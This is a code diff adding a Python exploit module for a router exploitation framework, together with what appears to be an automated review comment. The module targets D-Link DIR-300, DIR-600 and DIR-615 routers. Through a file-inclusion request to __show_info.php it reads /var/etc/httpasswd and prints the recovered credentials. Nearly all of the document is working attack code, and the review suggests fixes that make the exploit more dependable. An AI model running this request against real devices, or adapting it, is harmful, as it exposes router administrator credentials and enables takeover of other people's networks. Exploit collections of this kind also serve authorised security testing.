dir300_600 and 615 information disclosure exploit
Showing
1 changed file
with
54 additions
and
0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
# Name:D-link DIR-300 DIR-600 and DIR-615 information disclosure | ||
# File:dir300_600_info.py | ||
# Author:Ján Trenčanský | ||
# License: GNU GPL v3 | ||
# Created: 18.07.2016 | ||
# Last modified: 18.07.2016 | ||
# Shodan Dork: | ||
# Description: Information disclosure on DIR-300, DIR-600 and DIR-615(4.0) | ||
# Based on: http://seclists.org/bugtraq/2013/Dec/11 | ||
|
||
import core.Exploit | ||
import core.io | ||
|
||
import requests | ||
import re | ||
from interface.messages import print_error, print_yellow, print_success, print_green | ||
|
||
|
||
class Exploit(core.Exploit.RextExploit): | ||
""" | ||
Name:D-link DIR-300 DIR-600 and DIR-615 information disclosure | ||
File:dir300_600_info.py | ||
Author:Ján Trenčanský | ||
License: GNU GPL v3 | ||
Created: 18.07.2016 | ||
Description: Information disclosure on DIR-300, DIR-600 and DIR-615(4.0) | ||
Based on: http://seclists.org/bugtraq/2013/Dec/11 | ||
Options: | ||
Name Description | ||
host Target host address | ||
port Target port | ||
""" | ||
password = "" | ||
|
||
def __init__(self): | ||
core.Exploit.RextExploit.__init__(self) | ||
|
||
def do_run(self, e): | ||
url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port) | ||
|
||
try: | ||
print_yellow("Sending exploit") | ||
response = requests.get(url, timeout=60) | ||
if response.status_code == 200 and "<center>" in response.text: | ||
print_success("credentials fetched") | ||
credentials = re.findall("<center>\n\t\t\t(.*)", response.text) | ||
print_green(credentials[0]) | ||
except requests.Timeout: | ||
print_error("timeout") | ||
except requests.ConnectionError: | ||
print_error("exploit failed") | ||
Exploit() |
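Review bot: In `do_run`, the `if response.status_code == 200 and "<center>" in response.text:` check has no `else`, so a device that answers without the marker (for instance one running fixed firmware) prints nothing after "Sending exploit", and an assessor cannot tell a negative result from a stalled run; an `else` branch calling `print_error("target does not appear to be vulnerable")` would make the outcome explicit. Inside that branch, `credentials[0]` raises IndexError when the page contains `<center>` but the `re.findall` pattern matches nothing, so guard it with `if credentials:` before printing. The `requests.ConnectionError` handler reports "exploit failed" although the request never reached the device; a message such as "connection failed" would keep the two cases apart. `import core.io` and the class attribute `password` are not used anywhere in the visible file. The recovered value is printed in clear text, so terminal output and logs from an assessment should be handled as containing device credentials. (The rendering has dropped indentation, so the nesting of the `if` inside the `try` is inferred.)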